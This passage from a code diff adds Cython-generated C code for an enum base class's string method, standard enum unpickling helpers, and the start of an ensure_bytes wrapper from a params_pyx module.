__pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__str__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_self,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_self)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 64, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__str__") < 0)) __PYX_ERR(1, 64, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_self = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__str__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 64, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_FlagBase_4__str__(__pyx_self, __pyx_v_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase_4__str__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__str__", 0); + + /* "EnumBase":65 + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + * return "%s.%s" % (self.__class__.__name__, self.name) # <<<<<<<<<<<<<< + * + * if PY_VERSION_HEX >= 0x03060000: + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_class); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_name_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_name); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __pyx_t_2 = 0; + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_s_s, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":64 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __pyx_unpickle___Pyx_EnumMeta(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_1__pyx_unpickle___Pyx_EnumMeta(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_1__pyx_unpickle___Pyx_EnumMeta = {"__pyx_unpickle___Pyx_EnumMeta", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_1__pyx_unpickle___Pyx_EnumMeta, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_1__pyx_unpickle___Pyx_EnumMeta(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_type = 0; + long __pyx_v___pyx_checksum; + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__pyx_unpickle___Pyx_EnumMeta (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_type,&__pyx_n_s_pyx_checksum,&__pyx_n_s_pyx_state,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_type)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_checksum)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle___Pyx_EnumMeta", 1, 3, 3, 1); __PYX_ERR(1, 1, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle___Pyx_EnumMeta", 1, 3, 3, 2); __PYX_ERR(1, 1, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__pyx_unpickle___Pyx_EnumMeta") < 0)) __PYX_ERR(1, 1, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v___pyx_type = values[0]; + __pyx_v___pyx_checksum = __Pyx_PyInt_As_long(values[1]); if (unlikely((__pyx_v___pyx_checksum == (long)-1) && PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_v___pyx_state = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle___Pyx_EnumMeta", 1, 3, 3, __pyx_nargs); __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__pyx_unpickle___Pyx_EnumMeta", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase___pyx_unpickle___Pyx_EnumMeta(__pyx_self, __pyx_v___pyx_type, __pyx_v___pyx_checksum, __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase___pyx_unpickle___Pyx_EnumMeta(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_v___pyx_PickleError = 0; + PyObject *__pyx_v___pyx_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle___Pyx_EnumMeta", 0); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0xe3b0c44, 0xda39a3e, 0xd41d8cd): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + */ + __pyx_t_1 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_t_1, __pyx_tuple__2, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (__pyx_t_2) { + + /* "(tree fragment)":5 + * cdef object __pyx_result + * if __pyx_checksum not in (0xe3b0c44, 0xda39a3e, 0xd41d8cd): + * from pickle import PickleError as __pyx_PickleError # <<<<<<<<<<<<<< + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) + */ + __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_s_PickleError); + __Pyx_GIVEREF(__pyx_n_s_PickleError); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_s_PickleError); + __pyx_t_3 = __Pyx_Import(__pyx_n_s_pickle, __pyx_t_1, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_PickleError); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_t_1); + __pyx_v___pyx_PickleError = __pyx_t_1; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":6 + * if __pyx_checksum not in (0xe3b0c44, 0xda39a3e, 0xd41d8cd): + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum # <<<<<<<<<<<<<< + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) + * if __pyx_state is not None: + */ + __pyx_t_3 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_v___pyx_PickleError, __pyx_t_1, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(1, 6, __pyx_L1_error) + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0xe3b0c44, 0xda39a3e, 0xd41d8cd): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + */ + } + + /* "(tree fragment)":7 + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) # <<<<<<<<<<<<<< + * if __pyx_state is not None: + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_ptype___Pyx_EnumMeta), __pyx_n_s_new); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v___pyx_type}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v___pyx_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + * return __pyx_result + */ + __pyx_t_2 = (__pyx_v___pyx_state != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":9 + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) + * if __pyx_state is not None: + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) # <<<<<<<<<<<<<< + * return __pyx_result + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 9, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle___Pyx_EnumMeta__set_state(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v___pyx_result), ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + * return __pyx_result + */ + } + + /* "(tree fragment)":10 + * if __pyx_state is not None: + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + * return __pyx_result # <<<<<<<<<<<<<< + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v___pyx_result); + __pyx_r = __pyx_v___pyx_result; + goto __pyx_L0; + + /* "(tree fragment)":1 + * def __pyx_unpickle___Pyx_EnumMeta(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("EnumBase.__pyx_unpickle___Pyx_EnumMeta", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v___pyx_PickleError); + __Pyx_XDECREF(__pyx_v___pyx_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":11 + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[0]) + */ + +static PyObject *__pyx_unpickle___Pyx_EnumMeta__set_state(struct __pyx_obj___Pyx_EnumMeta *__pyx_v___pyx_result, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + Py_ssize_t __pyx_t_2; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle___Pyx_EnumMeta__set_state", 0); + + /* "(tree fragment)":12 + * return __pyx_result + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[0]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 12, __pyx_L1_error) + } + __pyx_t_2 = PyTuple_GET_SIZE(__pyx_v___pyx_state); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(1, 12, __pyx_L1_error) + __pyx_t_3 = (__pyx_t_2 > 0); + if (__pyx_t_3) { + } else { + __pyx_t_1 = __pyx_t_3; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_3 = __Pyx_HasAttr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 12, __pyx_L1_error) + __pyx_t_1 = __pyx_t_3; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "(tree fragment)":13 + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[0]) # <<<<<<<<<<<<<< + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_update); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 13, __pyx_L1_error) + } + __pyx_t_5 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_5}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "(tree fragment)":12 + * return __pyx_result + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[0]) + */ + } + + /* "(tree fragment)":11 + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[0]) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("EnumBase.__pyx_unpickle___Pyx_EnumMeta__set_state", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":29 + * + * + * def ensure_bytes(v): # <<<<<<<<<<<<<< + * return v.encode() if isinstance(v, str) else v; + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_1ensure_bytes(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_1ensure_bytes = {"ensure_bytes", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_1ensure_bytes, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_1ensure_bytes(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_v = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("ensure_bytes (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_v,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_v)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 29, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "ensure_bytes") < 0)) __PYX_ERR(0, 29, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_v = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("ensure_bytes", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 29, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.ensure_bytes", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_ensure_bytes(__pyx_self, __pyx_v_v); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject 